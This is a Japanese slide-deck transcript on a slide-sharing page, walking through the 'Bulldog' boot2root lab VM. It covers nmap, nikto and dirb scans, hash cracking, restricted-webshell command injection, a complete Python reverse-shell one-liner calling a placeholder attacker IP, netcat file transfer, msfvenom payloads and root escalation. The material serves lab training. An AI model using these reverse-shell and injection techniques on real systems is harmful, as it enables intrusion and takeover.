Upgrade to PRO for Only $50/Year—Limited-Time Offer! 🔥

boot2root_kalilinux_bulldog

Avatar for MarkUP MarkUP
November 02, 2018
0
23

 boot2root_kalilinux_bulldog

Avatar for MarkUP

MarkUP

November 02, 2018
Tweet

More Decks by MarkUP

See All by MarkUP
OwaspZap
Avatar for MarkUP markup
0
92
burpsuite_badstore
Avatar for MarkUP markup
0
120
boot2root_kalilinux_droopy
Avatar for MarkUP markup
0
33
侵入検知のファーストステップ
Avatar for MarkUP markup
0
680

Featured

See All Featured
jQuery: Nuts, Bolts and Bling
Avatar for Doug Neiner dougneiner
65
8.3k
Making Projects Easy
Avatar for Brett Harned brettharned
120
6.5k
Why Mistakes Are the Best Teachers: Turning Failure into a Pathway for Growth
Avatar for Umar Saidu Auna auna
0
25
HDC tutorial
Avatar for Michiel Stock michielstock
0
260
Making the Leap to Tech Lead
Avatar for Ryan Cromwell cromwellryan
135
9.7k
Dominate Local Search Results - an insider guide to GBP, reviews, and Local SEO
Avatar for Greg Gifford greggifford
PRO
0
11
How GitHub (no longer) Works
Avatar for Zach Holman holman
316
140k
The Psychology of Web Performance [Beyond Tellerrand 2023]
Avatar for Tammy Everts tammyeverts
49
3.2k
Designing Experiences People Love
Avatar for Jonathan Moore moore
143
24k
個人開発の失敗を避けるイケてる考え方 / tips for indie hackers
Avatar for panda_program panda_program
122
21k
Lessons Learnt from Crawling 1000+ Websites
Avatar for Charles Meaden charlesmeaden
0
940
<Decoding/> the Language of Devs - We Love SEO 2024
Avatar for Nikki Halliwell nikkihalliwell
0
98

Transcript

  1. サーバ侵入手法 Bulldog

  2. BulldogVM • インストール https://www.vulnhub.com/entry/bulldog-1,211/

  3. Virtualbox ダウンロード https://www.virtualbox.org/wiki/Downloads

  4. Virtualbox インポート

  5. Virtualbox ネットワーク設定

  6. Virtualbox ネットワーク設定

  7. Virtualbox スナップショット

  8. ホスト検索 ①> nmap –sP 192.168.99.0/24 –sP: pingを利用してそのネットワークで現在動作している マシンの一覧を取得する事が出来る

  9. ポートスキャン ①> nmap -A 192.168.99.101 -A:OSの種類やその他詳細なバージョン情報などを取得可能

  10. ポートスキャン

  11. サーバスキャン ①> nikto –h 192.168.99.101 -h:対象のIPアドレスを指定するオプション

  12. サーバスキャン /dev/

  13. ディレクトリスキャン ①> dirb http://192.168.99.101/ /usr/share/wordlists/dirb/ common.txt ディクショナリファイル(/usr/share/wordlists/dirb/common.t xt)を使用してディレクトリのWebサーバー(http://192.168.99. 101/)をスキャンします。 参考:https://tools.kali.org/web-applications/dirb

  14. ディレクトリスキャン /admin/

  15. http(ポート80)へのアクセス ECサイトっぽいが閉鎖中

  16. http(ポート80)へのアクセス ハッキングを受けた的な 事を書いているけど、こ こから特に情報は得れな い。

  17. /dev/ sshが可能であることと、WebShell があることが記載されている。 WebShellでは認証が要求される

  18. /admin/ 管理者画面へアクセス可能 usrnameとpasswordが必要

  19. /dev/ ソース メールアドレスとハッシュ値を取得

  20. ハッシュ値のクラッキング ・オンラインのハッシュクラッキングツールを使用する http://crackhash.com/ https://crackstation.net/ nickとsarahのパスワードが わかった

  21. 管理者ページへの認証 管理者ページの認証をnick かsarahのどちらかでログイ ンすると、webshellの利用 条件が整う。

  22. WebShell • webshellへアクセスすると、使用できるコマンドが制限されて いる。

  23. echoコマンド echoコマンドはバック クォートで囲った中身をコ マンドとして実行し、その 結果を出力する。 または、$(…)で囲うことで も実行可能。

  24. 「|」パイプ シンプルに「|(パイプ)」で も制限外のコマンドを使用 できることがわかる。

  25. ReverseShell • リバースシェルの仕組み ①攻撃コードを送信 ②攻撃に成功し、被攻撃側が攻撃側に接続を行うよう命令が実行され る ③攻撃側が待ち受けているポートに被攻撃側が接続し、制御が奪われ る 参考: http://www.atmarkit.co.jp/ait/articles/1507/01/news023.html

  26. ReverseShell • python2系がインストールされているサーバなのでpythonのリ バースシェルを使用する。 shell.py 参考: http://pentestmonkey.net/cheat- sheet/shells/reverse-shell-cheat-sheet import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect

    (("attackerIP",attackerPort));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p =subprocess.call(["/bin/sh","-i"]);

  27. ncコマンド ・リバースシェルファイルをtargetへ転送 target attacker

  28. ReverseShell ・リバースシェルの実行 attacker target

  29. (参考)ncコマンド ・port scaning(ポートが空いているか確認) % nc -vz [remotehost] 23 ・port knoking

    (ポートを使用してるサービスを確認) % nc [remotehost] 80 ・ファイル転送 (転送先) % nc -lvp 20000 ※標準出力される (転送先) % nc -lvp 20000 > file ※ファイル出力される (転送元) % nc [remotehost] 20000 < file オプション -z ポートスキャニングモード オプション -l リッスンモード オプション -v 情報表示モード オプション -p ポート番号指定

  30. msfvenomを使用したReverseShell metasploitの機能であり、ペイロードジェネレータです。 リバースシェルのペイロードを作成できます。 https://www.offensive-security.com/metasploit-unleashed/ms fvenom/

  31. ncコマンド ・リバースシェルファイルをtargetへ転送 target attacker

  32. Metasploit framework

  33. Metasploit framework ・リバースシェルの実行 attacker target

  34. Metasploit framework

  35. root権限へ昇格

  36. パスワード推測 SUPERultH imatePASH SWORDyouH CANTget SUPERultHimatePASHSWORDyouHCANTget SUPERultimatePASSWORDyouCANTget

  37. 権限昇格